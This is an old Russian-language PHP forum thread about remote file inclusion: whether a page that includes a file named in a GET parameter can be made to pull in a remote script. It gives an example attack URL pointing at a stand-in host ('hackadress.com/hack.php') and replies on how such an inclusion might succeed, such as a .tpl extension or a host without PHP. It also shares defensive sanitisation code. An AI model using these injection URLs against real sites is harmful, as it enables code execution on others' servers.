Справочник функций

Ваш аккаунт

Войти через: 
Забыли пароль?
Регистрация
Информацию о новых материалах можно получать и без регистрации:

Почтовая рассылка

Подписчиков: -1
Последний выпуск: 19.06.2015

Если заинклайдить сайт?

6.0K
06 октября 2006 года
merlex
78 / / 25.02.2006
Web-программерством стал интересоваться недавно.

Вопрос. Если допустим создать некую пхп страничку, и вней указать инструкцию Include('адрес_файла'), в качестве адреса файла указать адрес index.php странички кагого либо сайта. Не получится ли так что при таком вложении из главного файла станут доступны переменные, и прочие данные из файла вложенного.

Если такое возможно то как с этим боротся?
244
06 октября 2006 года
UAS
2.0K / / 19.07.2006
C HTTP запроса на сайт на пхп-страницу данные этого php-файла не будут выодится. Выведется уже готовая страница
15
06 октября 2006 года
shaelf
2.7K / / 04.05.2005
2merlex Попутный вопрос. А если самому попробывать? На это нужно буквально 2 минуты. Ответ на твой вопрос + повторный заход сюда занял больше времени.
6.0K
07 октября 2006 года
merlex
78 / / 25.02.2006
2 shaelf на самом деле я конечно же сам пробовал, но на всякий случай решил еще спросить, может есть какието нюансы, навроде, специальные атрибуты файлам выставлять надо или еще чего нибудь.
256
08 октября 2006 года
foxweb
1.0K / / 27.07.2005
Не сказали самого главного: парень просто захотел что-то взломать. Но "заинклайдить" удалённый скрипт средствами HTTP не получится (попробуйте запросить скрипт по http - у вас же в браузере не исходник выводится, верно?). Кроме того, на большинстве хостингов отключена такая опция, как прозрачная загрузка файлов по сети.
6.0K
08 октября 2006 года
merlex
78 / / 25.02.2006
2 foxweb, ну не взломать, скорее просто защитится от взлома. Вот допустим многие люди которые только начинают использовать ПХП, очень часто делают одну индексную страничку а затем вкладывают в нее другие странички, причем их адрес берут из GET переменной.
Что-то типа http://myadress.com/?id=post.php
ну и если указать http://myadress.com/?id=http://hackadress.com/hack.php то вероятно произойдет что-то не очень хорошее.
15
08 октября 2006 года
shaelf
2.7K / / 04.05.2005
Если этот метод приемлим, то можешь просто делать для запроса
 
Код:
$page = str_replace("/", "", $_GET['id']);
$page = str_replace(".", "", $page);
if(strlen($page) > 8) {
    include('error.html');
} else {
    $page = $page . ".php";
    include($page);
}

Как вариант можно ещё использововать switch, но как мне кажется этот метод более гибкий, т.к. при добавлении новых страничек не нужно ковырять контроллер. Единственное ограничение тут только то, что название файла должно быть не больше 8 символов.
256
08 октября 2006 года
foxweb
1.0K / / 27.07.2005
Я пример кода приводить не буду, скажу лишь только то, что в именах я делаю проерку только для символов и только для файлов, которые реально существуют в директории. Хотя... вот пример:

 
Код:
if ((empty($_GET[mod]))||(!file_exists("$MOD_DIR/$_GET[mod].php"))||(!ctype_alpha($_GET[mod]))) $mod = "index";
  else $mod = $_GET[mod];
304
09 октября 2006 года
Fenyx
707 / / 26.01.2005
[QUOTE=merlex]2 foxweb, ну не взломать, скорее просто защитится от взлома. Вот допустим многие люди которые только начинают использовать ПХП, очень часто делают одну индексную страничку а затем вкладывают в нее другие странички, причем их адрес берут из GET переменной.
Что-то типа http://myadress.com/?id=post.php
ну и если указать http://myadress.com/?id=http://hackadress.com/hack.php то вероятно произойдет что-то не очень хорошее.[/QUOTE]
http://myadress.com/?id=http://hackadress.com/hack.php скорей всего не сработает а вот http://myadress.com/?id=http://hackadress.com/hack.tpl может :)
15
09 октября 2006 года
shaelf
2.7K / / 04.05.2005
>>http://myadress.com/?id=http://hackadress.com/hack.php скорей всего не сработает
Он сработает только если на hackadress.com нету поддержки РНР (тот же народ).
Реклама на сайте | Обмен ссылками | Ссылки | Экспорт (RSS) | Контакты
Добавить статью | Добавить исходник | Добавить хостинг-провайдера | Добавить сайт в каталог